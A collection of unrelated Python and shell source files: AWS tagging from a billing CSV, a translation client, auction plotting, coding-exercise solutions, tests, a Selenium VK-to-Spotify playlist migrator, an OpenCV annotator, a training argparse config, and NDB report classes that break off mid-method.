column_headers = ["tag_channel", "resource_id", "service"]
column_index = {"tag_channel": None, "resource_id": None, "service": None}
# Map AWS billing service names to the boto3 service used to tag them.
service_names = {"AmazonEC2": "ec2", "AmazonS3": "s3api", "AmazonVPC": "ec2", "AWSLambda": "lambda", "AmazonApiGateway": "apigateway"}
found_headers=False
# One boto3 client per taggable service.
client = boto3.client("ec2")
clientAPIGateway = boto3.client("apigateway")
clientLambda = boto3.client("lambda")
with open("sample_september.csv") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",")
# read csv file row by row
for row in csv_reader:
if not found_headers:
# loop through list containing column headers
print("column_index:", column_index)
for header in column_headers:
try:
print("Header:", header)
# find index for column header
column_index[header] = row.index(header)
print("column_index[header] ", column_index[header])
except Exception as e:
print("Caught an exception when looking up index:", e)
# unable to locate column header from file; exit program
sys.exit()
# assign to True to skip header lookup on next row
found_headers=True
print("column_index:", column_index)
else:
# print tag and its index
#print(row)
print("service:", service_names[row[column_index['service']]], "resource_id:",row[column_index['resource_id']], "tag_channel:",row[column_index['tag_channel']])
if service_names[row[column_index['service']]] == 'ec2':
print("It is EC2")
response = client.create_tags(
DryRun = False,
Resources = [
row[column_index['resource_id']],
],
Tags=[{
'Key': 'Channel',
'Value': row[column_index['tag_channel']]
}])
if service_names[row[column_index['service']]] == 'apigateway':
print("API Gateway")
response = clientAPIGateway.tag_resource(
resourceArn = row[column_index['resource_id']],
tags={
'Channel' : row[column_index['tag_channel']]
})
if service_names[row[column_index['service']]] == 'lambda':
print("AWS Lambda")
response = clientLambda.tag_resource(
Resource = row[column_index['resource_id']],
Tags={
'Channel' : row[column_index['tag_channel']]
})
|
import requests
import json
class fanyi:
    """Minimal client for Baidu Translate's extendtrans endpoint (en -> zh)."""

    def __init__(self, keyword):
        # Text to be translated.
        self.keyword = keyword

    def result(self):
        """POST the keyword to the API and return the joined 'st_tag' entries."""
        endpoint = "https://fanyi.baidu.com/extendtrans"
        # Form payload expected by the endpoint.
        payload = {"query": self.keyword,
                   "from": "en",
                   "to": "zh"}
        request_headers = {
            'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Mobile Safari/537.36'
        }
        reply = requests.post(endpoint, payload, headers=request_headers)
        # Decode the JSON body and pull out the suggested tags.
        parsed = json.loads(reply.content.decode())
        return ','.join(parsed["data"]["st_tag"])
if __name__ == "__main__":
    # Read a query from stdin and print its translation tags.
    print(fanyi(input()).result())
|
#!/usr/bin/env python2.7
# encoding: utf-8
"""
std_asymmetries.py
Created by Jakub Konka on 2012-05-31.
Copyright (c) 2012 University of Strathclyde. All rights reserved.
"""
from __future__ import division
import sys
import os
import math
import numpy as np
import scipy.integrate as integrate
import matplotlib.pyplot as plt
def main():
  """Plot the equilibrium inverse bid functions of a two-bidder asymmetric auction.

  Computes the common bid support, the constants of integration, and the two
  inverse bid functions, then shows v(b) and b(v) plots. No return value.
  """
  # Params: value supports [lower, upper] for each bidder.
  v1 = [0.125, 0.625]
  v2 = [0.375, 0.875]
  # Bid bounds
  b = [(4 * v1[0] * v2[0] - (v1[1] + v2[1])**2) / (4 * (v1[0] - v1[1] + v2[0] - v2[1])), (v1[1] + v2[1]) / 2]
  print(b)
  # Constants of integration
  c1 = ((v2[1]-v1[1])**2 + 4*(b[0]-v2[1])*(v1[0]-v1[1])) / (-2*(b[0]-b[1])*(v1[0]-v1[1])) * math.exp((v2[1]-v1[1]) / (2*(b[0]-b[1])))
  c2 = ((v1[1]-v2[1])**2 + 4*(b[0]-v1[1])*(v2[0]-v2[1])) / (-2*(b[0]-b[1])*(v2[0]-v2[1])) * math.exp((v1[1]-v2[1]) / (2*(b[0]-b[1])))
  print(c1)
  print(c2)
  # Inverse bid functions
  vf1 = lambda x: v1[1] + (v2[1]-v1[1])**2 / (c1*(v2[1]+v1[1]-2*x)*math.exp((v2[1]-v1[1])/(v2[1]+v1[1]-2*x)) + 4*(v2[1]-x))
  vf2 = lambda x: v2[1] + (v1[1]-v2[1])**2 / (c2*(v1[1]+v2[1]-2*x)*math.exp((v1[1]-v2[1])/(v1[1]+v2[1]-2*x)) + 4*(v1[1]-x))
  # Sampling & plotting.
  bids = np.linspace(b[0], b[1], 100)
  # BUG FIX: map() returns a lazy iterator on Python 3, which plt.plot cannot
  # handle; materialize the samples as lists instead.
  graph_vf1 = [vf1(x) for x in bids]
  graph_vf2 = [vf2(x) for x in bids]
  plt.figure()
  plt.plot(bids, graph_vf1, '-', linewidth=2)
  plt.plot(bids, graph_vf2, '--', linewidth=2)
  plt.xlabel(r"Bid, $b$")
  plt.ylabel(r"Value, $v(b)$")
  plt.grid()
  plt.figure()
  plt.plot(graph_vf1, bids, '-', linewidth=2)
  plt.plot(graph_vf2, bids, '--', linewidth=2)
  plt.xlabel(r"Value, $v$")
  plt.ylabel(r"Bid, $b(v)$")
  plt.grid()
  plt.show()
# Run the plotting routine only when executed as a script.
if __name__ == '__main__':
  main()
|
"""
LeetCode - Easy
"""
"""
Given a positive integer num, write a function which returns True if num is a perfect square else False.
Follow up: Do not use any built-in library function such as sqrt.
Example 1:
Input: num = 16
Output: true
Example 2:
Input: num = 14
Output: false
Constraints:
1 <= num <= 2^31 - 1
"""
class Solution:
    def isPerfectSquare(self, num: int) -> bool:
        """Return True iff num is a perfect square, via binary search (no sqrt)."""
        lo, hi = 0, num
        while lo <= hi:
            mid = (lo + hi) // 2
            squared = mid * mid
            if squared == num:
                return True
            # Narrow the half that can still contain the square root.
            if squared < num:
                lo = mid + 1
            else:
                hi = mid - 1
        return False
if __name__ == '__main__':
    # Quick sanity check: 17 is not a perfect square.
    print(Solution().isPerfectSquare(17))
|
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import subprocess
import time
import fixtures
from oslotest import base as test_base
from oslo_concurrency import watchdog
LOG_FORMAT = '%(levelname)s %(message)s'
class WatchdogTest(test_base.BaseTestCase):
    """Exercises the logging behaviour of oslo_concurrency.watchdog.watch()."""

    def setUp(self):
        super(WatchdogTest, self).setUp()
        # Route all records through a fake logger so each test can inspect
        # exactly what the watchdog emitted.
        self.logger = logging.getLogger()
        self.logger.setLevel(logging.DEBUG)
        self.log = self.useFixture(
            fixtures.FakeLogger(format=LOG_FORMAT, level=None)
        )

    def test_in_process_delay(self):
        # Sleeping past the deadline must emit exactly one DEBUG record.
        with watchdog.watch(self.logger, "in process", after=1.0):
            time.sleep(2)
        output = self.log.output
        self.assertIn("DEBUG in process not completed after 1", output)
        recorded = output.rstrip().split("\n")
        self.assertEqual(1, len(recorded), recorded)

    def test_level_setting(self):
        # A custom level= must be honoured in the emitted record.
        with watchdog.watch(self.logger, "in process",
                            level=logging.ERROR, after=1.0):
            time.sleep(2)
        output = self.log.output
        self.assertIn("ERROR in process not completed after 1", output)
        recorded = output.rstrip().split("\n")
        self.assertEqual(1, len(recorded), recorded)

    def test_in_process_delay_no_message(self):
        # Finishing before the deadline must stay silent.
        with watchdog.watch(self.logger, "in process", after=1.0):
            pass
        # wait long enough to know there won't be a message emitted
        time.sleep(2)
        self.assertEqual('', self.log.output)

    def test_in_process_exploding(self):
        # An exception inside the block cancels the watchdog quietly.
        try:
            with watchdog.watch(self.logger, "ungraceful exit", after=1.0):
                raise Exception()
        except Exception:
            pass
        # wait long enough to know there won't be a message emitted
        time.sleep(2)
        self.assertEqual('', self.log.output)

    def test_subprocess_delay(self):
        # The watchdog must also fire while a child process is running.
        with watchdog.watch(self.logger, "subprocess", after=0.1):
            subprocess.call("sleep 2", shell=True)
        self.assertIn("DEBUG subprocess not completed after 0",
                      self.log.output)
|
# Print two fixed greeting lines.
printf '%s\n' "hello world"
printf '%s\n' "learning"
|
from selenium import webdriver
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.options import Options
import json
from time import sleep
from bs4 import BeautifulSoup
import sys
import os
# Chrome options shared by the whole script; headless flag is set in question().
gui_options = Options()
gui_options.add_argument('--log-level=3')  # suppress most Chrome console noise
def question():
    """Ask whether to run headless (no GUI) and set gui_options accordingly.

    Keeps prompting until the user answers Y or N.
    """
    while True:
        answer = input("Тихий перенос (без отображения GUI) Y/N ?\n")
        if answer == "Y":
            gui_options.headless = True
            os.system('cls')
            return
        if answer == "N":
            gui_options.headless = False
            os.system('cls')
            return
        # Invalid input: clear the console, explain, ask again.
        os.system('cls')
        print("Введите Y или N")
# Ask about headless mode before the browser is created.
question()
driver = webdriver.Chrome(options=gui_options)
# Generous wait for page loads; a short wait for per-track lookups.
wait = WebDriverWait(driver, 30)
wait_for_track = WebDriverWait(driver, 3)
def login_vk():
    """Log in to vk.com with credentials from data.json.

    Returns False on failure, None on success — main() relies on the
    `== False` distinction, so success must NOT return False.
    """
    try:
        # Read credentials once through a context manager; the original
        # called json.load(open(...)) twice and leaked both file handles.
        with open("data.json") as fh:
            credentials = json.load(fh)['vk']
        driver.get("https://vk.com/login")
        wait.until(ec.visibility_of_element_located((By.ID, 'email')))
        driver.find_element_by_id("email").send_keys(credentials['login'])
        wait.until(ec.visibility_of_element_located((By.ID, 'pass')))
        driver.find_element_by_id("pass").send_keys(credentials['password'])
        wait.until(ec.visibility_of_element_located((By.ID, 'login_button')))
        driver.find_element_by_id("login_button").click()
        return print("Вход в VK успешен")
    except Exception:
        # Narrowed from a bare `except:` so Ctrl+C / SystemExit still propagate.
        return False
def Go_to_music_vk():
    """Open the VK music section; returns False on failure, None on success."""
    try:
        wait.until(ec.visibility_of_element_located((By.XPATH, '//*[@id="l_aud"]/a')))
        driver.find_element_by_xpath('//*[@id="l_aud"]/a').click()
        print("Перешёл в раздел музыки")
    except Exception:
        # Narrowed from a bare `except:` so Ctrl+C / SystemExit still propagate.
        return False
def Scroll_page():
    """Scroll to the bottom repeatedly until the page height stops growing.

    Forces VK's lazy-loaded audio list to materialize fully.
    Returns False on failure, None on success.
    """
    try:
        last_height = driver.execute_script("return document.body.scrollHeight")
        while True:
            driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
            # Give the page time to load the next batch of tracks.
            sleep(2)
            new_height = driver.execute_script("return document.body.scrollHeight")
            if new_height == last_height:
                break
            last_height = new_height
        print("Страница успешно проскроллена")
        return
    except Exception:
        # Narrowed from a bare `except:` so Ctrl+C / SystemExit still propagate.
        return False
def Get_music_list(music_vk_html, music_vk_list):
    """Fill music_vk_list with '<title> <artist>' strings scraped from VK.

    :param music_vk_html: output list for the raw innerHTML of each audio row
    :param music_vk_list: output list for the assembled track names
    Returns False on failure, None on success.
    """
    try:
        for row in driver.find_elements_by_class_name("audio_row__inner"):
            music_vk_html.append(row.get_attribute("innerHTML"))
        # Iterate the collected fragments directly instead of by index.
        for fragment in music_vk_html:
            soup = BeautifulSoup(fragment, "lxml")
            music = soup.find(class_="audio_row__title_inner _audio_row__title_inner").text
            music += " " + soup.find("a").text
            music_vk_list.append(music)
        print(f"Список песен получен\nКоличество песен:{len(music_vk_list)}")
    except Exception:
        # Narrowed from a bare `except:` so Ctrl+C / SystemExit still propagate.
        return False
def login_spotify():
    """Log in to Spotify with credentials from data.json.

    Returns False on failure, None on success.
    """
    try:
        # Read credentials once through a context manager; the original
        # called json.load(open(...)) twice and leaked both file handles.
        with open("data.json") as fh:
            credentials = json.load(fh)['spotify']
        driver.get("https://accounts.spotify.com/ru/login/?continue=https://open.spotify.com/search")
        wait.until(ec.visibility_of_element_located((By.ID, 'login-username')))
        driver.find_element_by_id("login-username").send_keys(credentials['login'])
        wait.until(ec.visibility_of_element_located((By.ID, 'login-password')))
        driver.find_element_by_id("login-password").send_keys(credentials['password'])
        wait.until(ec.visibility_of_element_located((By.ID, 'login-button')))
        driver.find_element_by_id("login-button").click()
        print("Вход в Spotify успешен")
    except Exception:
        # Narrowed from a bare `except:` so Ctrl+C / SystemExit still propagate.
        return False
def Translate_BMP(list_obj):
    """Replace characters outside the Basic Multilingual Plane with U+FFFD.

    ChromeDriver cannot send non-BMP characters (emoji etc.) to input fields,
    so every code point above U+FFFF is mapped to the replacement character.

    :param list_obj: list of strings to sanitize (left unmodified)
    :return: new list with sanitized strings, same order
    """
    # Per-character scan instead of the original str.translate() call, which
    # rebuilt a ~1M-entry mapping table (all code points above U+FFFF) on
    # every invocation.
    return [''.join(ch if ord(ch) <= 0xFFFF else '\ufffd' for ch in text)
            for text in list_obj]
def Add_music(music_vk_list):
    """Search each VK track in Spotify and 'like' the first result.

    Tracks are processed oldest-first (list reversed). Failures on single
    tracks are reported and skipped.
    """
    # XPaths hoisted to named constants so the flow below is readable.
    SEARCH_FIELD = '//*[@id="main"]/div/div[2]/div[1]/header/div[3]/div/div/input'
    CLEAR_BUTTON = '//*[@id="main"]/div/div[2]/div[1]/header/div[3]/div/div/div/button'
    HEART_BUTTON = '//*[@id="searchPage"]/div/div/section[2]/div/div[2]/div/div/div[2]/div[1]/div/div/div[2]/button'
    translated_list = Translate_BMP(music_vk_list)
    wait.until(ec.visibility_of_element_located((By.XPATH, SEARCH_FIELD)))
    translated_list.reverse()
    for i in range(len(translated_list)):
        try:
            print("============================")
            driver.find_element_by_xpath(SEARCH_FIELD).send_keys(translated_list[i])  # type the query
            wait_for_track.until(ec.element_to_be_clickable((By.XPATH, HEART_BUTTON)))  # wait for result
            driver.find_element_by_xpath(HEART_BUTTON).click()  # like the track
            driver.find_element_by_xpath(CLEAR_BUTTON).click()  # clear the search box
            print(f"Трек '{translated_list[i]}' успешно добавлен\nОсталось треков:{len(translated_list) - i}")
            wait_for_track.until(ec.url_changes(driver.current_url))
        except Exception:
            # Narrowed from a bare `except:`; clear the box and move on.
            driver.find_element_by_xpath(CLEAR_BUTTON).click()
            print(f"Не удалось добавить трек {translated_list[i]}\nОсталось треков:{len(translated_list) - i}")
            continue
def main():
    """Drive the full VK -> Spotify transfer, aborting on any failed step."""
    def _abort(message):
        # Report the failure, give the user time to read it, then exit.
        # (Step functions return None on success, so `== False` below only
        # matches an explicit failure.)
        print(message)
        print("Программа завершиться через 10 секунд")
        print("============================")
        sleep(10)
        sys.exit()

    music_vk_html = []
    music_vk_list = []
    print("============================")
    if login_vk() == False:
        _abort("Ошибка при логине в VK")
    print("============================")
    if Go_to_music_vk() == False:
        _abort("Ошибка при переходе в раздел музыки")
    print("============================")
    if Scroll_page() == False:
        _abort("Ошибка при скролле страницы")
    print("============================")
    if Get_music_list(music_vk_html, music_vk_list) == False:
        _abort("Ошибка при получении композиций")
    print("============================")
    if login_spotify() == False:
        _abort("Ошибка при логине в Spotify")
    print("============================")
    if Add_music(music_vk_list) == False:
        _abort("Ошибка при добавлении музыки в Spotify")
    print("============================")
# Run the transfer only when executed as a script.
if __name__ == "__main__":
    main()
import cv2
import random
import numpy as np
scale = 0.5  # display-to-original coordinate scale factor
circles = []  # clicked points as [x, y, (b, g, r) colour]
counter = 0  # 0 -> expecting first corner, 1 -> expecting second corner
counter2 = 0  # total number of clicks recorded
point1 = []  # first corner of the current region (original-image coords)
point2 = []  # second corner of the current region (original-image coords)
myPoints = []  # finished regions as [point1, point2, name]
myColor = []  # marker colour for the current region
path = '/Users/fneut/Desktop/PP/QueryImages'  # directory holding the query image
def mousePoints(event, x, y, flags, params):
    """OpenCV mouse callback: collect two clicks as a named rectangle."""
    global counter, point1, point2, counter2, circles, myColor
    if event != cv2.EVENT_LBUTTONDOWN:
        return
    if counter == 0:
        # First corner: store it in original-image coordinates and pick a
        # random colour for this region's markers.
        point1 = int(x // scale), int(y // scale)
        counter += 1
        myColor = (random.randint(0, 2) * 200,
                   random.randint(0, 2) * 200,
                   random.randint(0, 2) * 200)
        print("uno")
    elif counter == 1:
        # Second corner: ask for a label and store the finished region.
        point2 = int(x // scale), int(y // scale)
        name = input('Enter Name ')
        myPoints.append([point1, point2, name])
        counter = 0
        print("dos")
    # Every click leaves a marker at the display coordinates.
    print(x, ",", y)
    circles.append([x, y, myColor])
    counter2 += 1
# Load the query image and show it at half size for annotation.
img = cv2.imread(path + "/" + 'imquery.png')
#img = cv2.resize(img, (0,0), None, scale, scale)
h,w,c = img.shape
img = cv2.resize(img,(w//2,h//2))
while True:
    # Redraw every recorded click as a small filled circle.
    for x,y,color in circles:
        cv2.circle(img, (x,y), 3, color, cv2.FILLED)
    cv2.imshow("Original Image", img)
    cv2.setMouseCallback("Original Image", mousePoints)
    # Press 's' to dump the collected regions and stop.
    if cv2.waitKey(1) & 0xff == ord('s'):
        print(myPoints)
        break
|
# Count paths from the top-left to the bottom-right of an HxW grid, moving
# only down or right and stepping only on '.' cells, modulo 1e9+7.
H, W = map(int, input().split())
grid = [input() for _ in range(H)]
MOD = 10 ** 9 + 7
paths = [[0] * W for _ in range(H)]
paths[0][0] = 1
for r in range(H):
    for c in range(W):
        # Push the count of paths reaching (r, c) to its two neighbours.
        if r + 1 < H and grid[r + 1][c] == ".":
            paths[r + 1][c] = (paths[r + 1][c] + paths[r][c]) % MOD
        if c + 1 < W and grid[r][c + 1] == ".":
            paths[r][c + 1] = (paths[r][c + 1] + paths[r][c]) % MOD
print(paths[H - 1][W - 1])
|
import pytest
import pdb
# Display ID and scoring weight consumed by the surrounding test harness.
test_id = f"{'2.3.3':<10} - Profile Snapshot"
test_weight = 10
def test_profile_snapshot(host):
    # Placeholder: intentionally fails until the real test is written.
    assert 0 == 1, "TODO - Write Test"
|
import os
import argparse
def parse_command():
    """Build and evaluate the command-line parser for speech-command training.

    :return: (Flags, unparsed) — the parsed namespace and any unrecognized args
    """
    def _str2bool(value):
        # BUG FIX: argparse `type=bool` treats any non-empty string (including
        # "False") as True; parse the common spellings explicitly instead.
        if isinstance(value, bool):
            return value
        if value.lower() in ('true', 't', 'yes', 'y', '1'):
            return True
        if value.lower() in ('false', 'f', 'no', 'n', '0'):
            return False
        raise argparse.ArgumentTypeError('Boolean value expected, got %r' % value)

    # expanduser('~') instead of os.getenv('HOME'): identical when HOME is
    # set, but does not crash on systems where it is not (e.g. Windows).
    home = os.path.expanduser('~')
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--data_dir',
        type=str,
        default=os.path.join(home, 'data'),
        help="""\
        Where to download the speech training data to. Or where it is already saved.
        """)
    parser.add_argument(
        '--preprocessed_data_dir',
        type=str,
        default=os.path.join(home, 'data/speech_commands_preprocessed'),
        help="""\
        Where to store preprocessed speech data (spectrograms) or load it, if it exists
        with the same parameters as are used in the current run.
        """)
    parser.add_argument(
        '--save_preprocessed_data',
        type=_str2bool,
        default=True,
        help="""\
        Whether to save the preprocessed spectrogram data for reuse.
        """)
    parser.add_argument(
        '--background_volume',
        type=float,
        default=0.1,
        help="""\
        How loud the background noise should be, between 0 and 1.
        """)
    parser.add_argument(
        '--background_frequency',
        type=float,
        default=0.8,
        help="""\
        How many of the training samples have background noise mixed in.
        """)
    parser.add_argument(
        '--silence_percentage',
        type=float,
        default=10.0,
        help="""\
        How much of the training data should be silence.
        """)
    parser.add_argument(
        '--unknown_percentage',
        type=float,
        default=10.0,
        help="""\
        How much of the training data should be unknown words.
        """)
    parser.add_argument(
        '--time_shift_ms',
        type=float,
        default=100.0,
        help="""\
        Range to randomly shift the training audio by in time.
        """)
    parser.add_argument(
        '--sample_rate',
        type=int,
        default=16000,
        help='Expected sample rate of the wavs',)
    parser.add_argument(
        '--clip_duration_ms',
        type=int,
        default=1000,
        help='Expected duration in milliseconds of the wavs',)
    parser.add_argument(
        '--window_size_ms',
        type=float,
        default=30.0,
        help='How long each spectrogram timeslice is',)
    parser.add_argument(
        '--window_stride_ms',
        type=float,
        default=20.0,
        help='How far to move in time between spectrogram timeslices',)
    parser.add_argument(
        '--dct_coefficient_count',
        type=int,
        default=40,
        help='How many bins to use for the MFCC fingerprint',)
    parser.add_argument(
        '--epochs',
        type=int,
        default=50,
        help='How many epochs to train',)
    parser.add_argument(
        '--num_train_samples',
        type=int,
        default=85511,
        help='How many samples from the training set to use',)
    parser.add_argument(
        '--num_val_samples',
        type=int,
        default=10102,
        help='How many samples from the validation set to use',)
    parser.add_argument(
        '--num_test_samples',
        type=int,
        default=4890,
        help='How many samples from the test set to use',)
    parser.add_argument(
        '--batch_size',
        type=int,
        default=100,
        help='How many items to train with at once',)
    parser.add_argument(
        '--model_architecture',
        type=str,
        default='ds_cnn',
        help='What model architecture to use')
    parser.add_argument(
        '--run_test_set',
        type=_str2bool,
        default=True,
        help='Run model.eval() on test set if True')
    parser.add_argument(
        '--saved_model_path',
        type=str,
        default='trained_models/scratch',
        help='File name to load pretrained model')
    parser.add_argument(
        '--tfl_file_name',
        default='aww_model.tflite',
        help='File name to which the TF Lite model will be saved')
    Flags, unparsed = parser.parse_known_args()
    return Flags, unparsed
|
from typing import TypeVar
from ndb_adapter.ndb_download import DownloadHelper
from ndb_adapter.ndb_download import DownloadType
def _assign_numbers(dic: dict) -> dict:
"""Private function for assign numbers values to dictionary
:param dic: report dictionary
:type dic: dict
:return: report dictionary
:rtype: dict
"""
for k, v in dic.items():
try:
if '.' in v:
dic[k] = float(v)
else:
dic[k] = int(v)
except ValueError:
pass
return dic
class SimpleReport(object):
    """A single row of a simple NDB search result."""

    def __init__(self, report: dict = None):
        """Initialise all fields with defaults, overlaid with *report* if given.

        :param report: report dictionary (default None)
        :type report: dict
        """
        self._report = {
            'NDB ID': '',
            'PDB ID': '',
            'Classification': '',
            'Title': '',
            'PDB Release Date': '',
            'Authors': '',
            'Citation Title': '',
            'Citation Detail': '',
            'Experiment': '',
            'Resolution': 0,
            'R work': 0,
            'R free': 0
        }
        if report:
            self._report.update(report)

    @property
    def pdb_id(self) -> str:
        """PDB ID of the structure."""
        return self._report['PDB ID']

    @property
    def ndb_id(self) -> str:
        """NDB ID of the structure."""
        return self._report['NDB ID']

    @property
    def title(self) -> str:
        """Structure title."""
        return self._report['Title']

    @property
    def classification(self) -> str:
        """Structure classification."""
        return self._report['Classification']

    @property
    def release_date(self) -> str:
        """PDB release date."""
        return self._report['PDB Release Date']

    @property
    def authors(self) -> str:
        """Structure authors."""
        return self._report['Authors']

    @property
    def citation_title(self) -> str:
        """Citation title."""
        return self._report['Citation Title']

    @property
    def citation_detail(self) -> str:
        """Citation detail."""
        return self._report['Citation Detail']

    @property
    def experimental_method(self) -> str:
        """Experimental method used to solve the structure."""
        return self._report['Experiment']

    @property
    def resolution(self) -> float:
        """Resolution of the structure."""
        return self._report['Resolution']

    @property
    def r_work(self) -> float:
        """R-work value."""
        return self._report['R work']

    @property
    def r_free(self) -> float:
        """R-free value."""
        return self._report['R free']

    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Download the structure file from NDB, preferring the PDB ID.

        :param download_type: file download type (default DownloadType.Pdb)
        :type download_type: DownloadType
        :param save: whether to write the file to disk (default False)
        :type save: bool
        :param target_dir: directory to save into (default: current dir)
        :type target_dir: str
        :return: file content as string, or None
        :rtype: str
        """
        id_structure = self.pdb_id
        if not id_structure:
            # Fall back to the NDB ID when no PDB ID is present.
            print("No pdb_id trying ndb_id")
            id_structure = self.ndb_id
        return DownloadHelper.download(id_structure, download_type, save, target_dir)

    def get_dict(self) -> dict:
        """The report as a plain dict."""
        return self._report

    def __str__(self) -> str:
        return str(self._report)
class _AdvancedBaseReport(object):
    """Common base for all advanced-search report rows."""

    def __init__(self):
        """Start with only the NDB ID field."""
        self._report = {
            'NDB ID': ''
        }

    def _update(self, report: dict) -> None:
        """Merge *report* into the internal field dictionary.

        :param report: extending report dict
        :type report: dict
        :return: None
        """
        self._report.update(report)

    @staticmethod
    def report_type() -> str:
        """Report type token used by the NDB advanced search — subclasses must override."""
        raise NotImplementedError

    @property
    def ndb_id(self) -> str:
        """NDB ID of the structure."""
        return self._report['NDB ID']

    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Download files from NDB — only implemented by some report subclasses."""
        raise NotImplementedError

    def get_dict(self) -> dict:
        """The report as a plain dict."""
        return self._report

    def __str__(self) -> str:
        return str(self._report)
class NDBStatusReport(_AdvancedBaseReport):
    """NDB status advanced-search report row."""

    def __init__(self, report: dict = None):
        """Seed the status fields with defaults, overlaid with *report* if given.

        :param report: report dict (default None)
        :type report: dict
        """
        super().__init__()
        self._update({
            'PDB ID': '',
            'Title': '',
            'NDB Release Date': '',
            'Authors': '',
            'Initial Deposition Date': ''
        })
        if report:
            self._update(report)

    @staticmethod
    def report_type() -> str:
        return 'ndbStatus'

    @property
    def pdb_id(self) -> str:
        """PDB ID of the structure."""
        return self._report['PDB ID']

    @property
    def title(self) -> str:
        """Structure title."""
        return self._report['Title']

    @property
    def release_date(self) -> str:
        """NDB release date."""
        return self._report['NDB Release Date']

    @property
    def deposition_date(self) -> str:
        """Initial deposition date."""
        return self._report['Initial Deposition Date']

    @property
    def authors(self) -> str:
        """Structure authors."""
        return self._report['Authors']

    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Download the structure file from NDB, preferring the PDB ID.

        :param download_type: file download type (default DownloadType.Pdb)
        :type download_type: DownloadType
        :param save: whether to write the file to disk (default False)
        :type save: bool
        :param target_dir: directory to save into (default: current dir)
        :type target_dir: str
        :return: file content as string, or None
        :rtype: str
        """
        id_structure = self.pdb_id
        if not id_structure:
            # Fall back to the NDB ID when no PDB ID is present.
            print("No pdb_id trying ndb_id")
            id_structure = self.ndb_id
        return DownloadHelper.download(id_structure, download_type, save, target_dir)
class CellDimensionsReport(_AdvancedBaseReport):
    """Unit-cell dimensions advanced-search report row."""

    def __init__(self, report: dict = None):
        """Seed the cell fields with defaults, overlaid with *report* if given.

        :param report: report dict (default None)
        :type report: dict
        """
        super().__init__()
        self._update({
            'Length A': 0,
            'Length B': 0,
            'Length C': 0,
            'Angle Alpha': 0,
            'Angle Beta': 0,
            'Angle Gamma': 0,
            'Space Group': ''
        })
        if report:
            # Numeric strings are converted to int/float on the way in.
            self._update(_assign_numbers(report))

    @staticmethod
    def report_type() -> str:
        return 'cellDim'

    @property
    def cell_a(self) -> float:
        """Cell length a, in angstroms."""
        return self._report['Length A']

    @property
    def cell_b(self) -> float:
        """Cell length b, in angstroms."""
        return self._report['Length B']

    @property
    def cell_c(self) -> float:
        """Cell length c, in angstroms."""
        return self._report['Length C']

    @property
    def cell_alpha(self) -> float:
        """Cell angle alpha, in degrees."""
        return self._report['Angle Alpha']

    @property
    def cell_beta(self) -> float:
        """Cell angle beta, in degrees."""
        return self._report['Angle Beta']

    @property
    def cell_gamma(self) -> float:
        """Cell angle gamma, in degrees."""
        return self._report['Angle Gamma']

    @property
    def space_group(self) -> str:
        """Crystallographic space group."""
        return self._report['Space Group']

    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Not supported for this report type; does nothing."""
        pass
class CitationReport(_AdvancedBaseReport):
    """Citation advanced-search report row."""

    def __init__(self, report: dict = None):
        """Seed the citation fields with defaults, overlaid with *report* if given.

        :param report: report dict (default None)
        :type report: dict
        """
        super().__init__()
        self._update({
            'PDB ID': '',
            'Citation Title': '',
            'Citation Authors': '',
            'Journal': '',
            'Pubmed ID': '',
            'Year': 0
        })
        if report:
            # Numeric strings (e.g. Year) are converted on the way in.
            self._update(_assign_numbers(report))

    @staticmethod
    def report_type() -> str:
        return 'citation'

    @property
    def pdb_id(self) -> str:
        """PDB ID of the structure."""
        return self._report['PDB ID']

    @property
    def citation_title(self) -> str:
        """Citation title."""
        return self._report['Citation Title']

    @property
    def citation_authors(self) -> str:
        """Citation authors."""
        return self._report['Citation Authors']

    @property
    def journal(self) -> str:
        """Journal the citation appeared in."""
        return self._report['Journal']

    @property
    def pubmed_id(self) -> str:
        """PubMed ID of the citation."""
        return self._report['Pubmed ID']

    @property
    def year(self) -> int:
        """Publication year."""
        return self._report['Year']

    def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
        """Download the structure file from NDB, preferring the PDB ID.

        :param download_type: file download type (default DownloadType.Pdb)
        :type download_type: DownloadType
        :param save: whether to write the file to disk (default False)
        :type save: bool
        :param target_dir: directory to save into (default: current dir)
        :type target_dir: str
        :return: file content as string, or None
        :rtype: str
        """
        id_structure = self.pdb_id
        if not id_structure:
            # Fall back to the NDB ID when no PDB ID is present.
            print("No pdb_id trying ndb_id")
            id_structure = self.ndb_id
        return DownloadHelper.download(id_structure, download_type, save, target_dir)
class RefinementDataReport(_AdvancedBaseReport):
    """Refinement-data advanced-search report row."""

    def __init__(self, report: dict = None):
        """Seed the refinement fields with defaults, overlaid with *report* if given.

        :param report: report dict (default None)
        :type report: dict
        """
        super().__init__()
        self._update({
            'R-value_work': 0,
            'R-value_obs': 0,
            'R-value_free': 0,
            'Higher Resolution Limit': 0,
            'Lower Resolution Limit': 0,
            'Reflections Observed': 0,
            'Structure Refinement': ''
        })
        if report:
            # Numeric strings are converted to int/float on the way in.
            self._update(_assign_numbers(report))

    @staticmethod
    def report_type() -> str:
        return 'ref'

    @property
    def r_work(self) -> float:
        """R-work value."""
        return self._report['R-value_work']

    @property
    def r_obs(self) -> float:
        """R-observed value."""
        return self._report['R-value_obs']

    @property
    def r_free(self) -> float:
        """R-free value."""
        return self._report['R-value_free']

    @property
    def higher_resolution(self) -> float:
